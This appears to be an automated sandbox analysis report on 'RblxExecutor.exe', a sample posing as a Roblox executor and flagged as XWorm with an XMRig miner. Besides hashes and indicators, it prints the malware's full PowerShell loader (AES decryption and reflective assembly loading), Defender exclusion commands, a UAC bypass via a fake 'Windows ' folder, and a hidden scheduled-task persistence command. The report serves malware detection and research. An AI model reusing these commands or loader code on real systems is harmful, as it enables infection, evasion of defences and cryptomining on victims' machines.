Analysis
-
max time kernel
147s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 18:40
Static task
static1
Behavioral task
behavioral1
Sample
RblxExecutor.exe
Resource
win7-20240508-en
General
-
Target
RblxExecutor.exe
-
Size
1.6MB
-
MD5
3a235f7f491d95d4727320239c0b4cb7
-
SHA1
b66d02b69f9d2cf011164406c6bc93a6728a65eb
-
SHA256
e9397b42b5c3f7770b873a76355bd59cbe097f30dc9b9349e9787832bbe9767a
-
SHA512
fa40f2d94bbe25372fc5eecb87168c3a55fb3fff1486ebd57d1f944760b43cc77a891fdbc246d5379e02b88b7f4f6abea0c94162e88ff87cabd246c7d8a5d83b
-
SSDEEP
24576:O83AQ99hyIMVdMJgsIX3b9M5Mm2f+qnbyy3q3PIMPKgPe8CWZoPJRMyoE:OWAE9AInJfF8dbRiteGmJKy
Malware Config
Extracted
xworm
185.196.8.135:7000
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3248-56-0x000001BFCD410000-0x000001BFCD428000-memory.dmp family_xworm -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
RblxExecutor.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ RblxExecutor.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ RblxExecutor.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ RblxExecutor.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
RblxExecutor.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions RblxExecutor.exe -
Looks for VirtualBox drivers on disk 2 TTPs 4 IoCs
Processes:
RblxExecutor.exedescription ioc process File opened (read-only) C:\Windows\System32\drivers\VBoxSF.sys RblxExecutor.exe File opened (read-only) C:\Windows\System32\drivers\VBoxVideo.sys RblxExecutor.exe File opened (read-only) C:\Windows\System32\drivers\VBoxMouse.sys RblxExecutor.exe File opened (read-only) C:\Windows\System32\drivers\VBoxGuest.sys RblxExecutor.exe -
XMRig Miner payload 9 IoCs
Processes:
resource yara_rule behavioral2/memory/4108-142-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/4108-143-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/4108-148-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/4108-149-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/4108-147-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/4108-145-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/4108-146-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/4108-150-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/4108-151-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig -
Blocklisted process makes network request 8 IoCs
Processes:
powershell.exepowershell.exeflow pid process 24 3248 powershell.exe 32 3248 powershell.exe 33 1980 powershell.exe 35 1980 powershell.exe 36 1980 powershell.exe 50 1980 powershell.exe 52 1980 powershell.exe 54 1980 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3752 powershell.exe 3248 powershell.exe 1980 powershell.exe 2596 powershell.exe 3264 powershell.exe 4660 powershell.exe 968 powershell.exe -
Looks for VMWare drivers on disk 2 TTPs 2 IoCs
Processes:
RblxExecutor.exedescription ioc process File opened (read-only) C:\Windows\System32\drivers\vmhgfs.sys RblxExecutor.exe File opened (read-only) C:\Windows\System32\drivers\vmmouse.sys RblxExecutor.exe -
Executes dropped EXE 1 IoCs
Processes:
ComputerDefaults.exepid process 4264 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
Processes:
ComputerDefaults.exepid process 4264 ComputerDefaults.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1980 set thread context of 4108 1980 powershell.exe AddInProcess.exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 4448 tasklist.exe 892 tasklist.exe 5064 tasklist.exe 392 tasklist.exe 3684 tasklist.exe 3828 tasklist.exe 2852 tasklist.exe 1132 tasklist.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
RblxExecutor.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName RblxExecutor.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
RblxExecutor.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4200 RblxExecutor.exe 4200 RblxExecutor.exe 3248 powershell.exe 1980 powershell.exe 1980 powershell.exe 3248 powershell.exe 968 powershell.exe 968 powershell.exe 968 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 3732 powershell.exe 3732 powershell.exe 3732 powershell.exe 4660 powershell.exe 4660 powershell.exe 4660 powershell.exe 3576 powershell.exe 3576 powershell.exe 3576 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3828 tasklist.exe Token: SeDebugPrivilege 2852 tasklist.exe Token: SeDebugPrivilege 1132 tasklist.exe Token: SeDebugPrivilege 4448 tasklist.exe Token: SeDebugPrivilege 892 tasklist.exe Token: SeDebugPrivilege 5064 tasklist.exe Token: SeDebugPrivilege 392 tasklist.exe Token: SeDebugPrivilege 3684 tasklist.exe Token: SeDebugPrivilege 3248 powershell.exe Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 968 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeDebugPrivilege 3732 powershell.exe Token: SeIncreaseQuotaPrivilege 3732 powershell.exe Token: SeSecurityPrivilege 3732 powershell.exe Token: SeTakeOwnershipPrivilege 3732 powershell.exe Token: SeLoadDriverPrivilege 3732 powershell.exe Token: SeSystemProfilePrivilege 3732 powershell.exe Token: SeSystemtimePrivilege 3732 powershell.exe Token: SeProfSingleProcessPrivilege 3732 powershell.exe Token: SeIncBasePriorityPrivilege 3732 powershell.exe Token: SeCreatePagefilePrivilege 3732 powershell.exe Token: SeBackupPrivilege 3732 powershell.exe Token: SeRestorePrivilege 3732 powershell.exe Token: SeShutdownPrivilege 3732 powershell.exe Token: SeDebugPrivilege 3732 powershell.exe Token: SeSystemEnvironmentPrivilege 3732 powershell.exe Token: SeRemoteShutdownPrivilege 3732 powershell.exe Token: SeUndockPrivilege 3732 powershell.exe Token: SeManageVolumePrivilege 3732 powershell.exe Token: 33 3732 powershell.exe Token: 34 3732 powershell.exe Token: 35 3732 powershell.exe Token: 36 3732 powershell.exe Token: SeDebugPrivilege 4660 powershell.exe Token: SeIncreaseQuotaPrivilege 4660 powershell.exe Token: SeSecurityPrivilege 4660 powershell.exe Token: SeTakeOwnershipPrivilege 4660 powershell.exe Token: SeLoadDriverPrivilege 4660 powershell.exe Token: SeSystemProfilePrivilege 4660 powershell.exe Token: SeSystemtimePrivilege 4660 powershell.exe Token: SeProfSingleProcessPrivilege 4660 powershell.exe Token: SeIncBasePriorityPrivilege 4660 powershell.exe Token: SeCreatePagefilePrivilege 4660 powershell.exe Token: SeBackupPrivilege 4660 powershell.exe Token: SeRestorePrivilege 4660 powershell.exe Token: SeShutdownPrivilege 4660 powershell.exe Token: SeDebugPrivilege 4660 powershell.exe Token: SeSystemEnvironmentPrivilege 4660 powershell.exe Token: SeRemoteShutdownPrivilege 4660 powershell.exe Token: SeUndockPrivilege 4660 powershell.exe Token: SeManageVolumePrivilege 4660 powershell.exe Token: 33 4660 powershell.exe Token: 34 4660 powershell.exe Token: 35 4660 powershell.exe Token: 36 4660 powershell.exe Token: SeIncreaseQuotaPrivilege 4660 powershell.exe Token: SeSecurityPrivilege 4660 powershell.exe Token: SeTakeOwnershipPrivilege 4660 powershell.exe Token: SeLoadDriverPrivilege 4660 powershell.exe Token: SeSystemProfilePrivilege 4660 powershell.exe Token: SeSystemtimePrivilege 4660 powershell.exe Token: SeProfSingleProcessPrivilege 4660 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AddInProcess.exepid process 4108 AddInProcess.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
RblxExecutor.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4200 wrote to memory of 4408 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 4408 4200 RblxExecutor.exe cmd.exe PID 4408 wrote to memory of 3828 4408 cmd.exe tasklist.exe PID 4408 wrote to memory of 3828 4408 cmd.exe tasklist.exe PID 4408 wrote to memory of 2620 4408 cmd.exe find.exe PID 4408 wrote to memory of 2620 4408 cmd.exe find.exe PID 4200 wrote to memory of 2064 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 2064 4200 RblxExecutor.exe cmd.exe PID 2064 wrote to memory of 2852 2064 cmd.exe tasklist.exe PID 2064 wrote to memory of 2852 2064 cmd.exe tasklist.exe PID 2064 wrote to memory of 2484 2064 cmd.exe find.exe PID 2064 wrote to memory of 2484 2064 cmd.exe find.exe PID 4200 wrote to memory of 4036 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 4036 4200 RblxExecutor.exe cmd.exe PID 4036 wrote to memory of 1132 4036 cmd.exe tasklist.exe PID 4036 wrote to memory of 1132 4036 cmd.exe tasklist.exe PID 4036 wrote to memory of 2352 4036 cmd.exe find.exe PID 4036 wrote to memory of 2352 4036 cmd.exe find.exe PID 4200 wrote to memory of 1584 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 1584 4200 RblxExecutor.exe cmd.exe PID 1584 wrote to memory of 4448 1584 cmd.exe tasklist.exe PID 1584 wrote to memory of 4448 1584 cmd.exe tasklist.exe PID 1584 wrote to memory of 3372 1584 cmd.exe find.exe PID 1584 wrote to memory of 3372 1584 cmd.exe find.exe PID 4200 wrote to memory of 1028 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 1028 4200 RblxExecutor.exe cmd.exe PID 1028 wrote to memory of 892 1028 cmd.exe tasklist.exe PID 1028 wrote to memory of 892 1028 cmd.exe tasklist.exe PID 1028 wrote to memory of 1636 1028 cmd.exe find.exe PID 1028 wrote to memory of 1636 1028 cmd.exe find.exe PID 4200 wrote to memory of 4108 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 4108 4200 RblxExecutor.exe cmd.exe PID 4108 wrote to memory of 5064 4108 cmd.exe tasklist.exe PID 4108 wrote to memory of 5064 4108 cmd.exe tasklist.exe PID 4108 wrote to memory of 3524 4108 cmd.exe find.exe PID 4108 wrote to memory of 3524 4108 cmd.exe find.exe PID 4200 wrote to memory of 228 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 228 4200 RblxExecutor.exe cmd.exe PID 228 wrote to memory of 392 228 cmd.exe tasklist.exe PID 228 wrote to memory of 392 228 cmd.exe tasklist.exe PID 228 wrote to memory of 3580 228 cmd.exe find.exe PID 228 wrote to memory of 3580 228 cmd.exe find.exe PID 4200 wrote to memory of 2168 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 2168 4200 RblxExecutor.exe cmd.exe PID 2168 wrote to memory of 3684 2168 cmd.exe tasklist.exe PID 2168 wrote to memory of 3684 2168 cmd.exe tasklist.exe PID 2168 wrote to memory of 3964 2168 cmd.exe find.exe PID 2168 wrote to memory of 3964 2168 cmd.exe find.exe PID 4200 wrote to memory of 1292 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 1292 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 4284 4200 RblxExecutor.exe cmd.exe PID 4200 wrote to memory of 4284 4200 RblxExecutor.exe cmd.exe PID 4284 wrote to memory of 2752 4284 cmd.exe cmd.exe PID 4284 wrote to memory of 2752 4284 cmd.exe cmd.exe PID 1292 wrote to memory of 2396 1292 cmd.exe cmd.exe PID 1292 wrote to memory of 2396 1292 cmd.exe cmd.exe PID 1292 wrote to memory of 3144 1292 cmd.exe cmd.exe PID 1292 wrote to memory of 3144 1292 cmd.exe cmd.exe PID 1292 wrote to memory of 3248 1292 cmd.exe powershell.exe PID 1292 wrote to memory of 3248 1292 cmd.exe powershell.exe PID 4284 wrote to memory of 4788 4284 cmd.exe cmd.exe PID 4284 wrote to memory of 4788 4284 cmd.exe cmd.exe PID 4284 wrote to memory of 1980 4284 cmd.exe powershell.exe PID 4284 wrote to memory of 1980 4284 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe"C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmtoolsd.exe" 2>NUL | find /I "vmtoolsd.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vmtoolsd.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /I "vmtoolsd.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxservice.exe" 2>NUL | find /I "vboxservice.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vboxservice.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /I "vboxservice.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwaretray.exe" 2>NUL | find /I "vmwaretray.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vmwaretray.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /I "vmwaretray.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwareuser.exe" 2>NUL | find /I "vmwareuser.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vmwareuser.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /I "vmwareuser.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmsrvc.exe" 2>NUL | find /I "vmsrvc.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vmsrvc.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /I "vmsrvc.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe" 2>NUL | find /I "Any.Run-VM-X64.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /I "Any.Run-VM-X64.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxtray.exe" 2>NUL | find /I "vboxtray.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vboxtray.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /I "vboxtray.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq VBoxService.exe" 2>NUL | find /I "VBoxService.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq VBoxService.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /I "VBoxService.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedist.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Al1zbpAcw0p1Fl078pB2HtNXnQs0rbUPPgfd/fVywvU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c9QR5kB90gp/nHGBONlVKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PUtXp=New-Object System.IO.MemoryStream(,$param_var); $QjusM=New-Object System.IO.MemoryStream; $jUotk=New-Object System.IO.Compression.GZipStream($PUtXp, [IO.Compression.CompressionMode]::Decompress); $jUotk.CopyTo($QjusM); $jUotk.Dispose(); $PUtXp.Dispose(); $QjusM.Dispose(); $QjusM.ToArray();}function execute_function($param_var,$param2_var){ $wbVDd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vzMCH=$wbVDd.EntryPoint; $vzMCH.Invoke($null, $param2_var);}$wGIQB = 'C:\Users\Admin\AppData\Local\Temp\VCRedist.bat';$host.UI.RawUI.WindowTitle = $wGIQB;$pFEsp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wGIQB).Split([Environment]::NewLine);foreach ($QqrJY in $pFEsp) { if ($QqrJY.StartsWith('PDfUAcFoTbCJIUyLDOns')) { $XhjVr=$QqrJY.Substring(20); break; }}$payloads_var=[string[]]$XhjVr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedists.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\VCRedists.bat';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"4⤵
-
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd6⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\VCRedists')4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
